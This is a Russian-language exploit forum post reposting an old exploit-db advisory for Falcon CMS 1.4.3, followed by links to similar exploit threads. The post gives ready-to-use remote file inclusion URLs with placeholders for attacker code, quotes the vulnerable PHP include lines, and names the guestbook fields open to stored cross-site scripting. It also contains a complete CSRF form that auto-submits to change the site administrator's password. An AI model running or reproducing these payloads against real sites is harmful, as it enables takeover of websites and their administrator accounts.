Exploit falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4712
Проверка EDB
  1. Пройдено
Автор
MHZ91
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-6490 cve-2007-6489 cve-2007-6488
Дата публикации
2007-12-10
Код: 
---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          
---------------------------------------------------------------
Http://www.inj3ct-it.org     Staff[at]inj3ct-it[dot]org 
---------------------------------------------------------------
  Multilple Remote File Inclusion - Permanent Xss
---------------------------------------------------------------
# Author: MhZ91
# Title: Falcon Series One - Multilple Remote File Inclusion + Permanent Xss
# Download: http://sourceforge.net/projects/falconcms/
# Bug: Multilple Remote File Inclusion + Permanent Xss
# Severity: High
# Visit: http://www.inj3ct-it.org
---------------------------------------------------------------
Exploit: http://[site]/sitemap.xml.php?dir[classes]=[Evil_Code]
Vuln code: @include_once ($dir['classes']."class.pages.php");
---------------------------------------------------------------
Exploit: http://[site]/errors.php?error=[Evil_Code]
Vuln code: <?include($_REQUEST["error"] . "/errors.php");?>
---------------------------------------------------------------
Permanent Xss at http://[site]/index.php?guestbook=v in the input gb_mail, gb_name and textarea gb_text your [Xss] and after the xss work here index.php?guestbook=v :p
---------------------------------------------------------------
Simple 1337 Csrf exploit:
<form name="form_change" action="http://[site]/index.php?admin=changepass" method="post">
<input type="hidden" name="f_pass" class="field" value="[YourPWD]" />
<input type="hidden" name="f_pass2" class="field" value="[YourPWD]" />
</form><script>document.form_change.submit()</script>
There is other more csrf and permanent xss.. 

# milw0rm.com [2007-12-10]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit BlueFace Falcon Web Server 2.0 - Error Message Cross-Site Scripting
Ответы
0
Просмотры
334
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Falcon Series One 1.4.3 stable - Multiple Input Validation Vulnerabilities
Ответы
0
Просмотры
343
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
Ответы
0
Просмотры
2K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
Ответы
1
Просмотры
1K
Эксплойты & Уязвимости
meselem
M
Exploiter
Exploit Webutler v3.2 - Remote Code Execution (RCE)
Ответы
0
Просмотры
643
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Ответы
0
Просмотры
628
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SPIP v4.2.0 - Remote Code Execution (Unauthenticated)
Ответы
0
Просмотры
928
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
Ответы
0
Просмотры
641
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Best POS Management System v1.0 - Unauthenticated Remote Code Execution
Ответы
0
Просмотры
623
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SitemagicCMS 4.4.3 - Remote Code Execution (RCE)
Ответы
0
Просмотры
631
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу